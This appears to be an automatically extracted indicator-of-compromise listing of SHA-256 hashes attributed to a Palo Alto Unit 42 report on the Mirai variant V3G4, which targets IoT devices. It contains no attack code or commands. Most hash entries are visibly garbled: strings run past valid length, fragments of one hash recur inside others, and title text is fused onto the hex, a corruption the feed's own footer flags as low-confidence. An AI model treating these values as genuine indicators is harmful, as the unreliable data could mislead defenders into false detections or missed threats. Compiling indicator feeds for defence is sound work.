Palo Alto Unit 42
· Aug 17, 2026
sha2566f654198e8efd5aff1c7a903353967d0e96aeff0402cb0a79fabbc10d18c63d21a76197003822252124e89987d061d6a4a33b9891cea778d3708cd50447 6f654198e8efd5aff1c7a903353967d0e96aeff0402cb0a79fabbc10d18c63d2 c288c200cf7bbebe7a81fd42ca1bd4c6cb6080f28f2cec297a0d3e6aff7Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha25673cc00acc478bf09658a679a4689f34598fe6e92086efe82900242f3cc5b7aecf1ffd2ec66a5076a7fea5d83caa8bbcdb0f3bc3bd030c77eded6f4b5d90 73cc00acc478bf09658a679a4689f34598fe6e92086efe82900242f3cc5b7aec 1218da43a62da76927484bca73a3eee53425c54625147f8d01149bcef2fMirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2567bc99c87a1e0582b5f15f40141226862fbe726b496e1e77c7f95993e8e945733420a978434e2b6a9e9b85b688a44593fa V3G4 Sample July Campaign 7bc99c87a1e0582b5f15f40141226862fbe726b496e1e77c7f95993e8e945733 88f7b9a8c4f9bb28582c485549b328d6123e8aea33009ce7657f7fc0ef8Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2567d9cdf3afb1d52f49d82b1ffe28a3da08c6aeeaa8c5047ba37c73802d2cd9ec26cabbb90dfe9cd75f12c01fb64766dd1ec0f4247dbf8f4477dd64407fbf 7d9cdf3afb1d52f49d82b1ffe28a3da08c6aeeaa8c5047ba37c73802d2cd9ec2 9a0d39265b53e1959df49dbc8727ad344abc12a8bc0bd8d8b76f8b15052Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2567dea8dac3f455f3a57fecfa5a047439126556858c239e73cd8feec2dc13bae2c0391279b014e53d73c2216a84bd528e18f1f633ba0101288aa963f77c5b 7dea8dac3f455f3a57fecfa5a047439126556858c239e73cd8feec2dc13bae2c a10ce475f64f3821ab32c88f6b013effd40843dd575ceaab46a57f134c2Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha25688f7b9a8c4f9bb28582c485549b328d6123e8aea33009ce7657f7fc0ef829e03c87a1e0582b5f15f40141226862fbe726b496e1e77c7f95993e8e945733 88f7b9a8c4f9bb28582c485549b328d6123e8aea33009ce7657f7fc0ef829e03 64545e94daafba191669333e1dd0c6e1190df47e0742bd515911cce0cdbMirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha256916e00391279b014e53d73c2216a84bd528e18f1f633ba0101288aa963f77c5b934f6f72941b9a60097ab09228d873a2f8737ee0ea93b08e5f1cc3916d1 916e00391279b014e53d73c2216a84bd528e18f1f633ba0101288aa963f77c5b 7dea8dac3f455f3a57fecfa5a047439126556858c239e73cd8feec2dc13Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2569a0d39265b53e1959df49dbc8727ad344abc12a8bc0bd8d8b76f8b150525dca6f3afb1d52f49d82b1ffe28a3da08c6aeeaa8c5047ba37c73802d2cd9ec2 9a0d39265b53e1959df49dbc8727ad344abc12a8bc0bd8d8b76f8b150525dca6 d00fbfc439cb9c5c850690134b0d51f262021c0d04d9934df464980c346Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2569b7f36cabbb90dfe9cd75f12c01fb64766dd1ec0f4247dbf8f4477dd64407fbf0880e2b5a8a8d43a5f1fd6f5d36fc665ab9b4031a9b6a4d52222004c2c1 9b7f36cabbb90dfe9cd75f12c01fb64766dd1ec0f4247dbf8f4477dd64407fbf 7d9cdf3afb1d52f49d82b1ffe28a3da08c6aeeaa8c5047ba37c73802d2cMirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha256a10ce475f64f3821ab32c88f6b013effd40843dd575ceaab46a57f134c2478b6dac3f455f3a57fecfa5a047439126556858c239e73cd8feec2dc13bae2c a10ce475f64f3821ab32c88f6b013effd40843dd575ceaab46a57f134c2478b6 d9b5199f36fc416d8a87d798926e0d9dcbb2fe97610cf08d6887dae1355Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.